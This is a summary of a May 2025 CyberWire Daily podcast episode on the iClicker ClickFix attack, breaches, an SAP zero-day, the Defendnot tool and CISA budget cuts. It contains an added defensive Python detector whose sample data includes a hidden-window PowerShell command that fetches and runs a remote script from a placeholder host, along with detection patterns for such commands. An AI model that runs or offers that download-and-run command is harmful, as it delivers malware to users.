CyberWire Daily: No Quick Fix for a ClickFix Attack
Release Date: May 12, 2025
Introduction
In this episode of CyberWire Daily, host Dave Bittner discusses the latest cybersecurity threats and incidents impacting various sectors. The episode delves into a sophisticated social engineering attack on the IClicker platform, significant privacy settlements involving Google, widespread cyberattacks affecting retail chains in the UK, and critical vulnerabilities exploited by state-sponsored hackers. Additionally, the episode features an in-depth interview with Tim Starks, a senior reporter from Cyberscoop, who sheds light on proposed budget cuts to the Cybersecurity and Infrastructure Security Agency (CISA) and the political dynamics surrounding them.
Major Security Incidents
ClickFix Social Engineering Attack on IClicker
Between April 12th and 16th, 2025, the student engagement platform IClicker, utilized by approximately 5,000 instructors and 7 million students across major US universities like Michigan and Florida, fell victim to a sophisticated ClickFix social engineering attack. The attack involved a fake CAPTCHA that deceived users into executing a malicious PowerShell script. This script, once run, connected to a remote server to download additional malware, which either granted hackers full access or installed benign software to evade detection. The likely payload was an information stealer targeting credentials, browser data, and cryptocurrency wallets.
- IClicker’s Response: On May 6th, IClicker confirmed the breach, assuring that their applications and data remained unaffected and that the vulnerability had been patched. However, the exact number of affected users remains uncertain.
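The download-and-run stage described above leaves a recognisable trace in process-creation telemetry. The following Python is an added example, not material from the episode: it scores Sysmon/EDR-style process events for the ClickFix pattern. The field names, the assumption that a pasted lure launches PowerShell from explorer.exe (the Run dialog), and the sample events are all constructed here.

```python
import re
from typing import Dict, List

# Constructed sample events (not from the page), modelled on the fields a
# Sysmon Event ID 1 / EDR process-creation record carries. Only the first
# is a ClickFix-style launch; the others are benign PowerShell use.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr http://example.invalid/verify.txt -UseBasicParsing)"'},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\Scripts\\backup.ps1"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -c Invoke-WebRequest https://intranet.example.invalid/report.csv -OutFile report.csv"},
    {"parent": "svchost.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumption: a user who pastes the lure's command runs it from the Run dialog or
# File Explorer, so explorer.exe as the parent marks an interactive launch.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Cmdlets/aliases that pull content from a remote server.
FETCH = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient|curl)\b|https?://",
    re.I)
# Tokens that execute what was fetched or hide the window from the victim.
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden", re.I)


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the ClickFix indicators present in one event; empty means nothing suspicious."""
    if ev["image"].lower() not in POWERSHELL:
        return []
    cmd = ev["cmdline"]
    reasons: List[str] = []
    if ev["parent"].lower() in INTERACTIVE_PARENTS:
        reasons.append("interactive launch from explorer.exe")
    if FETCH.search(cmd):
        reasons.append("fetches remote content")
    if EXECUTE.search(cmd):
        reasons.append("executes fetched content or hides window")
    # A bare fetch is routine admin work; fetch plus execute (or fetch from an
    # interactive parent) is the download-and-run stage the episode describes.
    return reasons if len(reasons) >= 2 and "fetches remote content" in reasons else []


def flag_clickfix(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return only the events that match, with their command line and reasons."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append({"cmdline": ev["cmdline"], "reasons": reasons})
    return hits
```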
Google's Privacy Settlement with Texas
Google is set to pay $1.375 billion to the state of Texas to resolve allegations that it secretly tracked users’ locations, private browsing activities, and biometric data without consent. The lawsuit, spearheaded by Attorney General Ken Paxton, claims that Google continued tracking users even with location services disabled and utilized collected data for advertising revenue. Additionally, it is alleged that Google amassed biometric data, such as facial geometry, without proper consent.
- Google’s Stance: Google has denied wrongdoing but has updated its privacy policies in response to the allegations.
- Significance: This settlement marks one of the largest privacy-related fines in the United States.
Cyberattack on UK’s Co-Op Stores
Co-Op, a major retail cooperative in the UK with over 3,000 locations, is grappling with severe operational disruptions due to a prolonged cyberattack that began two weeks prior to the episode's release. The attack has led to empty shelves as key logistics systems remain offline, hindering deliveries.
- Impact on Operations: Staff report that depot shipments have dropped to below 20% of normal levels, prioritizing perishable items like meat, dairy, and eggs, while non-perishables such as produce, canned goods, and cigarettes remain scarce.
- Data Compromise: CEO Shirine Khoury-Haq confirmed that customer and member data were compromised, although the specific nature of the hack remains unclear.
- Recovery Efforts: Despite all stores remaining open, the recovery process is expected to take several weeks. On the Scottish island of Islay, Co-Op has implemented special delivery procedures to mitigate the impact.
Ascension Health Data Breach
Ascension Health reported a data breach affecting over 437,000 patients due to a vulnerability in a third-party vendor's software, not their own systems. Hackers exploited this flaw to steal sensitive information, including names, contact details, Social Security numbers, and health data. The breach is linked to the Clop ransomware group's December 2023 attack on Cleo’s file transfer platform.
- Response: Impacted patients are being offered two years of free credit monitoring.
- Historical Context: This incident is smaller compared to Ascension's May 2024 ransomware attack, which affected 5.6 million individuals.
Critical Zero-Day Vulnerability in SAP Netweaver
A critical zero-day vulnerability in SAP Netweaver's Internet Communication Manager has been actively exploited by Chinese state-sponsored hackers. The flaw allows unauthenticated remote code execution via crafted HTTP requests.
- Current Exploitation: Despite the release of emergency patches, many SAP systems remain exposed.
- Target Sectors: High-value sectors such as finance and manufacturing are primary targets, aiming to steal sensitive data and establish persistent access.
- Detection Challenges: Researchers identified custom malware named Safire, which uses encrypted communication over SAP protocols, complicating detection efforts.
- Operational Impact: The attack chain initiates with a malicious SOAP request exploiting memory corruption, delivering a reverse shell, and subsequently modifying SAP configurations to maintain access. This campaign has disrupted operations in critical sectors, including healthcare, government, and infrastructure.
Varonis Uncovers Major Cybersecurity Threats
Varonis has identified two significant cybersecurity threats targeting IT administrators and cloud systems:
- SEO Poisoning for Malware Delivery:
  - Method: Attackers exploit search engine optimization (SEO) poisoning to trick administrators into downloading malware masquerading as legitimate tools.
  - Consequences: These fake downloads can install backdoors like Smokemant or monitoring software, leading to credential theft and data exfiltration. In one instance, nearly a terabyte of data was stolen before a ransomware attack ensued.
- Critical Root Access Flaw in Azure’s AZNFS Mount Utility:
  - Vulnerability: A flaw in Azure's AZNFS Mount utility, used in High-Performance Computing (HPC) and AI workloads, allows unprivileged users to escalate privileges to root by exploiting environment variables.
  - Severity: Although Microsoft has rated it as low severity, the potential for complete cloud compromise is significant.
  - Recommendations: Varonis urges immediate patching and advocates for a defense-in-depth strategy to mitigate exposure.
US Prosecutors Charge Foreign Nationals in Botnet Takedown
US prosecutors have charged three Russians and one Kazakhstani in relation to the dismantling of two major botnets, Anyproxy and 5socks. These botnets were part of an operation named Moonlander, which fraudulently converted outdated wireless routers into proxy servers available for rent on the now-seized websites, offering over 7,000 proxies and generating approximately $46 million over two decades.
- Operation Details: The campaign involved international cooperation and technical analysis from Lumen Technologies. Infected routers were primarily located in Oklahoma but had a global reach across more than 80 countries.
- Security Implications: The FBI warns that outdated routers, particularly older models from Linksys, Cisco, and TP-Link, remain prime targets for exploitation by various threat actors, including Chinese hackers.
- Preventative Measures: Authorities recommend replacing unsupported routers to prevent similar compromises.
Defendnot: A New Tool Disabling Microsoft Defender
A newly developed tool named Defendnot has emerged, which disables Microsoft Defender by exploiting the Windows Security Center API. Created by a GitHub developer, Defendnot tricks Windows into recognizing a fake antivirus product as legitimate, thereby prompting the automatic disabling of Defender to avoid conflicts.
- Mechanism: The tool leverages reverse-engineered interactions with the undocumented Windows Security Center (WSC) API, injecting its code into trusted processes like Task Manager.
- Persistence and Risks: While Defendnot requires administrative privileges and persistent installation to survive reboots, its ability to disable Defender poses significant risks if misused by malware developers.
- Expert Insights: Security experts highlight that although Defendnot may not showcase advanced technical prowess, it exposes a critical security gap in how Windows manages antivirus product registration. The tool builds upon the developer’s previous project, no-defender, emphasizing the need for enhanced safeguards within WSC’s architecture.
Interview with Tim Starks: CISA Budget Cuts and Political Reactions
Tim Starks, a senior reporter from Cyberscoop, provides an in-depth analysis of the proposed $491 million budget cut to CISA, representing approximately 17-20% of its funding. This potential reduction has sparked significant controversy among lawmakers and cybersecurity experts.
Key Points from the Interview:
- Budget Proposal Context:
  - The administration's skinny budget proposal indicated substantial cuts to CISA without detailed justifications.
  - The rhetoric suggests that CISA is viewed by some as part of a "censorship industrial complex," although the administration has not provided concrete evidence to support this claim.
- Legislative Reactions:
  - Democratic appropriators have vehemently opposed the cuts, labeling them a "killing blow" to the agency’s capabilities.
  - Republican committee chairperson Mark Amodei expressed the need for more detailed explanations, highlighting ongoing threats from China and Russia and questioning the rationale behind reducing CISA's budget.
  - Senator Chris Murphy, the top Democrat on the Homeland Security Appropriations Subcommittee, labeled the cuts an "illegal gutting of cybersecurity at DHS" intended to divert funds to border security.
- Administration’s Justification:
  - The administration claims budget cuts are necessary to reduce the size of government, though this justification appears more ideological than based on CISA’s performance or needs.
- CISA’s Current Status:
  - CISA has already experienced personnel and program cuts, including the elimination of roles focused on monitoring extremist activities.
  - Kristi Noem, a prominent Republican, has referred to CISA as the "Ministry of Truth," echoing concerns about the agency's role in misinformation and censorship.
- Leadership and Future Outlook:
  - The nominee for CISA, Sean Plankey, is regarded as a competent cybersecurity professional who may strive to shield the agency from political interference and maintain its core mission despite budgetary constraints.
  - Historical parallels were drawn with the first Trump administration’s approach under Chris Krebs, who effectively kept CISA operational without getting entangled in political disputes.
- Strategic Implications:
  - Given the persistent cyber threats from nation-states, critics argue that cutting CISA’s budget undermines national cybersecurity resilience.
  - Tim Starks expressed skepticism about the administration's rationale, emphasizing the ongoing need for robust cybersecurity measures in the face of escalating threats.
Notable Quotes:
- Tim Starks [14:32]: "It's a pretty massive potential cut. And the reasons they talked about doing this, you know, they don't go into a lot of details..."
- Senator Chris Murphy [17:26]: "This was illegal because you're ignoring congressional mandates."
- Tim Starks [20:39]: "It doesn't make a lot of sense, like we were talking about. Why, you know, if you're, if you're concerned about Russia and China... that CISA has stood by and said, we believe Russia is a cyber threat."
Additional Security Insights
Common Denominators in Security Incidents
Dave Bittner highlights that the common denominator in security incidents is the escalation and lateral movement within networks. Compromised privileged accounts can lead to attackers seizing control of critical assets, especially in environments with poor directory hygiene and extensive technical debt. Identity attack paths, particularly in Active Directory, Entra ID, and hybrid configurations, remain attractive targets for threat actors due to their exploitability and the difficulty defenders face in detecting such breaches.
- Mitigation Strategy: Identity leaders are increasingly employing attack path management to connect identity and security teams, thereby reducing risk. Tools like BloodHound Enterprise, powered by SpecterOps, are instrumental in visualizing and securing attack paths.
US Copyright Office AI Study
The US Copyright Office released a pre-publication version of part three of its AI study, coinciding with the abrupt dismissal of its top leadership. The 108-page report examines how copyright law, particularly fair use, should apply to AI training processes.
- Key Findings:
  - Presumptive Infringement: The report posits that copying during AI training is presumptively infringing and that even the model's weights may contain protected expressions.
  - Fair Use Criteria: Emphasizes that fair use depends on the ultimate application of the AI, not merely its training methodology.
  - Market Dilution Theory: Introduces a novel theory suggesting that AI-generated content could flood markets and devalue them, even without direct copying.
- Legal Implications: While courts are not bound by the report, its detailed reasoning is expected to influence over 40 ongoing copyright cases involving generative AI. The report’s future impact remains uncertain due to shifting political landscapes, but its legal arguments are already influencing broader discussions.
Conclusion
This episode of CyberWire Daily underscores the evolving and multifaceted nature of cybersecurity threats in 2025. From sophisticated social engineering attacks on educational platforms to significant privacy settlements and state-sponsored exploits, the landscape remains perilous. The in-depth interview with Tim Starks highlights the precarious position of CISA amidst political maneuvering, emphasizing the need for sustained investment in cybersecurity infrastructure. Additionally, emerging tools like Defendnot and comprehensive studies on AI’s legal implications underscore the continuous arms race between threat actors and defenders. Staying informed and proactive is imperative for both organizations and individuals to navigate the complex cybersecurity terrain effectively.
Notable Quotes with Timestamps:
- Dave Bittner [00:02]: "We're going to talk about why attackers still love Web apps in 2025..."
- Tim Starks [14:30]: "The administration's skinny budget... indicated that they would be looking to cut CISA's budget by $491 million."
- Tim Starks [16:36]: "Senator Murphy's case was, this is illegal because you're ignoring congressional mandates."
- Tim Starks [20:39]: "It doesn’t make a lot of sense... why would you cut these agencies? They need to do a better job..."
- Dave Bittner [20:59]: "Our adversaries are not slowing down or dialing back their investments in misinformation..."
- Tim Starks [22:19]: "Sean Plankey... can find a way to walk that tightrope."
Credits
- Senior Producer: Alice Carruth
- Producer: Liz Stokes
- Mixer: Trey Hester
- Music & Sound Design: Elliot Peltzman
- Executive Producer: Jennifer Eiben
- Publisher: Peter Kilpe
- Host: Dave Bittner
Additional Resources
- Register for CyberWire’s Live Webinar: Visit events.thecyberwire.com to register for the live discussion on the state of modern web application security.
- DeleteMe Special Offer: Listeners can receive a 20% discount on DeleteMe plans by visiting JoinDeleteMe.com/N2K and using promo code N2K at checkout.
- ThreatLocker: Explore ThreatLocker’s solutions at www.threatlocker.com to secure your environment against ransomware and other attacks.
- Vanta Compliance Automation: Learn more about automating security compliance with Vanta at vanta.com.
Stay Informed: For more insights and daily briefings, subscribe to CyberWire Daily and ensure you’re equipped with the knowledge to stay ahead in the ever-changing cybersecurity landscape.